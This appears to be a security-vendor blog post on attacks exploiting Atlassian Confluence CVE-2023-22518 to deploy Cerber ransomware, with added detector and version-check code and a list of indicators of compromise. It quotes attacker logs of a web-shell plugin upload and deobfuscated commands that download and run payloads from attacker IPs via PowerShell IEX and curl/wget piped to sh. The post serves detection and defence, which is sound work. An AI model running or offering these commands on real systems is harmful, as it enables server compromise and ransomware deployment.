Last updated Friday, November 10, 2023, 19:23:07 GMT

Daniel Lydon and Conor Quinn contributed attacker behavior insights to this blog.

As of November 5, 2023, Rapid7 Managed Detection and Response (MDR) is observing exploitation of Atlassian Confluence in multiple customer environments, including for ransomware deployment. We have confirmed that at least some of the exploits are targeting CVE-2023-22518, an improper authorization vulnerability affecting Confluence Data Center and Confluence Server. Atlassian published an advisory for the vulnerability on October 31, 2023. MDR has also observed attempts to exploit CVE-2023-22515, a critical broken access control vulnerability in Confluence that came to light on October 4.

Atlassian updated their CVE-2023-22518 advisory on November 3 to note that exploitation of the vulnerability had been reported to them by a customer.

Observed attacker behavior

On November 5, 2023, Rapid7 MDR began responding to exploitation of Confluence Server within various customer environments. The alerts we observed occurred between 2023-11-05 10:08:34 and 23:05:35 UTC.

The process execution chain was, for the most part, consistent across multiple environments, indicating possible mass exploitation of vulnerable internet-facing Atlassian Confluence servers.

Rapid7 observed POST requests in HTTP access logs (/atlassian/confluence/logs) on both Windows and Linux. The requests were sent to /json/setup-restore.action?synchronous=true, as in the example below:

[05/Nov/2023:11:54:54 +0000] - SYSTEMNAME 193.176.179[.]41 POST /json/setup-restore.action?synchronous=true HTTP/1.1 302 44913ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:09 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/?os_authType=basic HTTP/1.1 200 153ms 388712 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 404 3ms 40 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /rest/plugins/1.0/?token=-TOKENNUM HTTP/1.1 202 26ms 344 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:11 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/tasks/1f5049f1-6fd7-471d-937c-7afbe3158019 HTTP/1.1 200 [elapsed time lost in extraction] 229 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:16 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/tasks/1f5049f1-6fd7-471d-937c-7afbe3158019 HTTP/1.1 200 3ms 274 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:16 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 [elapsed time lost in extraction] 212 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 13ms 283 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 14ms 556 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:18 +0000] admin SYSTEMNAME 193.176.179[.]41 DELETE /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 204 129ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
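The access-log chain above has a recognisable shape: an unauthenticated POST to the setup-restore endpoint, then authenticated Universal Plugin Manager (/rest/plugins/1.0/) traffic, then POSTs to a servlet under /plugins/servlet/. The detector below, an added example that is not part of the Rapid7 post, parses lines in that log layout, groups stage hits per client IP and rates each client. The sample lines are constructed (documentation-range IPs, trimmed user agents) and the stage names, severity ladder and field regex are this example's own assumptions, not Rapid7 detection rule logic.

```python
import re
from collections import defaultdict

# Constructed sample lines in the field layout of the Confluence access-log
# excerpt: [timestamp] user host client-ip METHOD path protocol status elapsed
# bytes referer user-agent. One client walks the whole chain; the others are
# ordinary traffic used to check the detector stays quiet.
SAMPLE_LOG = """\
[05/Nov/2023:11:54:54 +0000] - SYSTEMNAME 198.51.100.7 POST /json/setup-restore.action?synchronous=true HTTP/1.1 302 44913ms - - Mozilla/5.0
[05/Nov/2023:11:56:09 +0000] admin SYSTEMNAME 198.51.100.7 GET /rest/plugins/1.0/?os_authType=basic HTTP/1.1 200 153ms 388712 - Mozilla/5.0
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 198.51.100.7 POST /rest/plugins/1.0/?token=-TOKENNUM HTTP/1.1 202 26ms 344 - Mozilla/5.0
[05/Nov/2023:11:56:16 +0000] admin SYSTEMNAME 198.51.100.7 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 12ms 212 - Mozilla/5.0
[05/Nov/2023:11:56:18 +0000] admin SYSTEMNAME 198.51.100.7 DELETE /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 204 129ms - - Mozilla/5.0
[05/Nov/2023:12:01:02 +0000] jdoe SYSTEMNAME 192.0.2.44 GET /rest/api/content/12345 HTTP/1.1 200 18ms 4021 - Mozilla/5.0
[05/Nov/2023:12:03:40 +0000] admin SYSTEMNAME 192.0.2.45 GET /rest/plugins/1.0/?os_authType=basic HTTP/1.1 200 140ms 388712 - Mozilla/5.0
"""

# Only the fields needed for triage are captured; the tail (elapsed, bytes,
# referer, user agent) is left unparsed so odd values there cannot break a match.
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+(?P<user>\S+)\s+(?P<host>\S+)\s+(?P<ip>\S+)\s+"
    r"(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+HTTP/\d\.\d\s+(?P<status>\d{3})"
)

# Stages of the observed chain as (method regex, path regex). Order matters:
# the first stage whose patterns both match wins. Stage names are assumptions.
STAGES = {
    "setup_restore": (r"POST", r"^/json/setup-restore\.action"),
    "shell_servlet": (r"POST", r"^/plugins/servlet/[^/]+/ShellServlet"),
    "upm_plugin_api": (r"[A-Z]+", r"^/rest/plugins/1\.0/"),
}


def parse_line(line):
    """Return the captured fields of one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(rec):
    """Map a parsed record to a chain stage name, or None for unrelated traffic."""
    for name, (method_re, path_re) in STAGES.items():
        if re.fullmatch(method_re, rec["method"]) and re.search(path_re, rec["path"]):
            return name
    return None


def analyze(log_text):
    """Group stage hits by client IP and rate each client."""
    hits = defaultdict(set)
    first_seen = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stage = classify(rec)
        if stage is None:
            continue
        hits[rec["ip"]].add(stage)
        first_seen.setdefault(rec["ip"], rec["ts"])

    findings = {}
    for ip, stages in hits.items():
        if "setup_restore" in stages and "shell_servlet" in stages:
            severity = "high"    # restore endpoint plus a shell servlet: full chain
        elif "setup_restore" in stages or "shell_servlet" in stages:
            severity = "medium"  # either half alone still deserves a look
        else:
            severity = "low"     # plugin-manager API traffic only; often legitimate
        findings[ip] = {"stages": sorted(stages), "severity": severity,
                        "first_seen": first_seen[ip]}
    return findings


if __name__ == "__main__":
    for ip, f in analyze(SAMPLE_LOG).items():
        print(f"{ip:16} {f['severity']:6} first seen {f['first_seen']}  stages={f['stages']}")
```

A 302 from setup-restore.action does not on its own prove the restore succeeded, which is why the ladder only reaches "high" when servlet activity follows from the same client; in practice the path regexes would be extended to whatever servlet names show up in your own logs.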

Rapid7 managed services observed the following processes on the host systems as part of exploitation:

  • Linux

Parent process:

/opt/atlassian/confluence/jre//bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=XXXX -Datlassian.plugins.startup.options= -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dconfluence.context.path= -Djava.locale.providers=JRE,SPI,SYSTEM -Dsynchrony.enable.xhr.fallback=true -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-YYYY-MM-DD_XX-XX-XX.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -Xlog:gc+age=debug:file=/opt/atlassian/confluence/logs/gc-YYYY-MM-DD_XX-XX-XX.log::filecount=5,filesize=2M -XX:G1ReservePercent=20 -XX:+UseG1GC -XX:+ExplicitGCInvokesConcurrent -XX:+PrintGCDateStamps -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=256m -Xms1024m -Xmx1024m -Dignore.endorsed.dirs= -classpath /opt/atlassian/confluence/bin/bootstrap.jar:/opt/atlassian/confluence/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence -Dcatalina.home=/opt/atlassian/confluence -Djava.io.tmpdir=/opt/atlassian/confluence/temp org.apache.catalina.startup.Bootstrap start

Child process:

/usr/bin/bash -c whoami

Additional commands (decoded and deobfuscated):

echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru

  • Windows

Parent process:

"DRIVE:\Confluence\bin\tomcat9.exe" //RS//Confluence

Child processes:

cmd /c whoami

Additional commands (decoded and deobfuscated):

IEX((New-Object Net.WebClient).DownloadString("hxxp[:]//193[.]176[.]179[.]41/tmp.37"))

Post-exploitation behavior

After initial enumeration activity (whoami commands spawned via Bash), the adversary executed Base64-encoded commands to spawn follow-on commands via python2 or python3.

/usr/bin/bash -c whoami
echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
uname -p 2> /dev/null (spawned by /usr/bin/python3.6)
-u (spawned by /usr/bin/python3.6)
/bin/chmod +x ./qnetd (spawned by /usr/bin/python3.6)
/bin/chmod 755 ./qnetd (spawned by /usr/bin/python3.6)
/tmp/qnetd (ransomware execution)

------------------------------------------
/usr/bin/bash -c whoami
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru
(curl -s hxxp://193.43.72[.]11/mdrg.sh || wget -q -O - hxxp://193.43.72[.]11/mdrg[.]sh)%7Csh
/usr/bin/cat /tmp/lru (spawned by /usr/bin/bash)
/usr/bin/uname -m (spawned by /usr/bin/bash)
/usr/bin/rm -rf /tmp/lru (spawned by /usr/bin/bash)
/usr/bin/rm -rf sh (spawned by /usr/bin/bash)
-u (spawned by /usr/bin/bash)
/usr/bin/rm -rf ./qnetd (spawned by /usr/bin/bash)
/usr/bin/chmod +x ./qnetd (spawned by /usr/bin/bash)
/usr/bin/chmod 755 ./qnetd (spawned by /usr/bin/bash)
/usr/bin/rm -rf ./qnetd (spawned by /usr/bin/python2.7)
(spawned by /usr/bin/python2.7)
-u (spawned by /usr/bin/python2.7)
/usr/bin/chmod +x ./qnetd (spawned by /usr/bin/python2.7)
/usr/bin/chmod 755 ./qnetd (spawned by /usr/bin/python2.7)
/tmp/qnetd (ransomware execution)
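The process chains above share three host-side tells regardless of which interpreter the actor used: a shell or Python interpreter whose ancestry leads back to Confluence's Tomcat, chmod on a freshly dropped file in the working directory or /tmp, and execution of a binary straight out of /tmp. The lineage detector below is an added example, not Rapid7's detection rule logic; it walks constructed process-creation events (pid, ppid, image, command line, in the style an endpoint agent would record) and raises one alert per matching event. The event dataclass, the regexes and the alert names are assumptions of this example; the Windows drive letter is a stand-in for the DRIVE: placeholder in the post.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # executable path as the endpoint agent recorded it
    cmdline: str   # full command line


# Confluence's Tomcat is recognised by its catalina.base on Linux or by the
# service launcher arguments on Windows (both taken from the parent-process
# lines in the post).
CONFLUENCE_PARENT = re.compile(
    r"-Dcatalina\.base=\S*confluence|tomcat9\.exe\"?\s+//RS//Confluence", re.I)
# Shell and script interpreters, matched on the image's final path component.
INTERPRETER = re.compile(
    r"(?:^|[/\\])(?:bash|sh|dash|cmd|powershell|pwsh|python[0-9.]*)(?:\.exe)?$", re.I)
# chmod +x / chmod NNN on a relative or /tmp path, as seen before qnetd ran.
CHMOD_IN_TMP = re.compile(r"chmod\s+(?:\+x|[0-7]{3,4})\s+(?:\./|/tmp/)")
EXEC_FROM_TMP = re.compile(r"^/tmp/")

# Constructed events: one Linux chain and one Windows chain descending from
# Confluence, plus an interactive SSH session that must not alert.
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, "/opt/atlassian/confluence/jre/bin/java",
              "/opt/atlassian/confluence/jre/bin/java -Dcatalina.base=/opt/atlassian/confluence "
              "org.apache.catalina.startup.Bootstrap start"),
    ProcEvent(1001, 1000, "/usr/bin/bash", "/usr/bin/bash -c whoami"),
    ProcEvent(1002, 1001, "/usr/bin/python3.6", "/usr/bin/python3.6 -u -"),
    ProcEvent(1003, 1002, "/bin/chmod", "/bin/chmod +x ./qnetd"),
    ProcEvent(1004, 1002, "/tmp/qnetd", "/tmp/qnetd"),
    ProcEvent(2000, 1, "/usr/sbin/sshd", "sshd: admin [priv]"),
    ProcEvent(2001, 2000, "/usr/bin/bash", "-bash"),
    ProcEvent(3000, 4, r"D:\Confluence\bin\tomcat9.exe",
              r'"D:\Confluence\bin\tomcat9.exe" //RS//Confluence'),
    ProcEvent(3001, 3000, r"C:\Windows\System32\cmd.exe", "cmd /c whoami"),
]


def descends_from_confluence(ev, by_pid, max_depth=32):
    """True if any ancestor of ev (within max_depth hops) is the Confluence Tomcat."""
    seen = set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen and len(seen) < max_depth:
        if CONFLUENCE_PARENT.search(cur.cmdline):
            return True
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return False


def detect(events):
    """Return (alert_name, pid, cmdline) tuples for events in Confluence's lineage."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if not descends_from_confluence(ev, by_pid):
            continue   # the same commands under sshd or cron are not this pattern
        if INTERPRETER.search(ev.image):
            alerts.append(("confluence_spawns_interpreter", ev.pid, ev.cmdline))
        if CHMOD_IN_TMP.search(ev.cmdline):
            alerts.append(("chmod_in_tmp_under_confluence", ev.pid, ev.cmdline))
        if EXEC_FROM_TMP.match(ev.image):
            alerts.append(("exec_from_tmp_under_confluence", ev.pid, ev.cmdline))
    return alerts


if __name__ == "__main__":
    for name, pid, cmdline in detect(SAMPLE_EVENTS):
        print(f"{name:34} pid={pid:<5} {cmdline}")
```

Walking the full ancestry rather than checking only the direct parent is what lets the python3 and chmod stages fire even though bash sits between them and Tomcat; the visited set guards against pid reuse producing a cycle in stale event data.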

Across multiple attack chains, Rapid7 observed post-exploitation command execution to download a malicious payload hosted at 193.43.72[.]11 and/or 193.176.179[.]41, which, if successful, led to single-system Cerber ransomware deployment on the exploited Confluence server.

Mitigation guidance

All versions of Confluence Server and Confluence Data Center are vulnerable to CVE-2023-22518. The vulnerability has been remediated in the following fixed versions:

  • 7.19.16
  • 8.3.4
  • 8.4.4
  • 8.5.3
  • 8.6.1

Atlassian Cloud users are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

Customers should update to a fixed version of Confluence on an emergency basis, restricting external access to the application at least until they are able to remediate. If you are unable to restrict access to the application or update on an emergency basis, Atlassian’s advisory includes interim measures you can take to mitigate risk from known attack vectors. As always, Rapid7 strongly recommends applying vendor-supplied patches rather than relying solely on temporary mitigations.
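To turn the fixed-version list into a check that can be run across an inventory, here is an added example (not Rapid7's or Atlassian's code) that encodes only the five fixed releases named above and decides per branch whether an installed version carries the fix. Two assumptions are built in and labelled in the code: versions in branches with no listed fix (8.0 to 8.2, or anything before 7.19) are treated as unpatched, and branches newer than 8.6 are assumed to inherit the fix; confirm both against Atlassian's current advisory before acting on the output.

```python
# Fixed releases for CVE-2023-22518 as listed in the post. Everything else is
# decided by the branch rules in assess().
FIXED_VERSIONS = ("7.19.16", "8.3.4", "8.4.4", "8.5.3", "8.6.1")


def parse_version(text):
    """'8.5.3' -> (8, 5, 3); rejects anything that is not three dotted integers."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected Confluence version string: {text!r}")
    return tuple(int(p) for p in parts)


def assess(version):
    """Return {'version', 'patched', 'minimum_fixed'} for one installed version."""
    v = parse_version(version)
    fixed = sorted(parse_version(f) for f in FIXED_VERSIONS)
    by_branch = {f[:2]: f for f in fixed}   # (major, minor) -> first fixed patch level
    newest = fixed[-1]                        # 8.6.1 with the list above

    if v[:2] in by_branch:
        # Same branch as a listed fix: patched once at or above that patch level.
        target = by_branch[v[:2]]
    else:
        # Assumption: branches without a listed fix (8.0-8.2, pre-7.19) have no
        # patch and must move to the newest fixed release; branches newer than
        # 8.6 are assumed to inherit the fix.
        target = newest
    return {
        "version": version,
        "patched": v >= target,
        "minimum_fixed": ".".join(str(n) for n in target),
    }


def triage(inventory):
    """Given [(hostname, version), ...] return the hosts that still need an upgrade."""
    needs_upgrade = []
    for host, version in inventory:
        try:
            result = assess(version)
        except ValueError as exc:
            needs_upgrade.append((host, version, f"unparseable: {exc}"))
            continue
        if not result["patched"]:
            needs_upgrade.append((host, version, f"upgrade to {result['minimum_fixed']} or later"))
    return needs_upgrade


if __name__ == "__main__":
    # Constructed inventory for illustration.
    sample = [("wiki-prod", "8.5.2"), ("wiki-test", "8.5.3"), ("wiki-legacy", "8.2.3"),
              ("wiki-lts", "7.19.16"), ("wiki-old", "7.13.0"), ("wiki-new", "8.7.1"),
              ("wiki-odd", "8.5")]
    for host, version, note in triage(sample):
        print(f"{host:12} {version:8} {note}")
```

Remember that atlassian.net-hosted sites are out of scope for this check, as the post notes; the inventory it runs over should contain only self-hosted Server and Data Center instances.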

Indicators of compromise

IP addresses:

  • 193.176.179[.]41
  • 193.43.72[.]11
  • 45.145.6[.]112

Domains:
j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad[.]onion

File hashes:

  • Bat file: /tmp/agttydcb.bat - MD5: 81b760d4057c7c704f18c3f6b3e6b2c4

  • ELF ransomware binary: /tmp/qnetd - SHA256: 4ed46b98d047f5ed26553c6f4fded7209933ca9632b998d265870e3557a5cdfe

Ransom note: read-me3.txt

MITRE ATT&CK Enterprise Techniques

Resource Development:
Acquire Infrastructure (T1583)
Develop Capabilities (T1587)
Obtain Capabilities (T1588)
Stage Capabilities (T1608)

Initial Access:
Exploit Public-Facing Application (T1190)

Execution:
Command and Scripting Interpreter (T1059)

Defense Evasion:
File and Directory Permissions Modification (T1222)
Indicator Removal (T1070)

Impact:
Data Encrypted for Impact (T1486)

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2023-22518 with an unauthenticated check available as of the November 1, 2023 content release.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. The following detection rules are deployed and alerting on activity related to Atlassian Confluence exploitation:

  • Suspicious Process - Confluence Java App Launching Processes
  • Webshell - Commands Launched by Webserver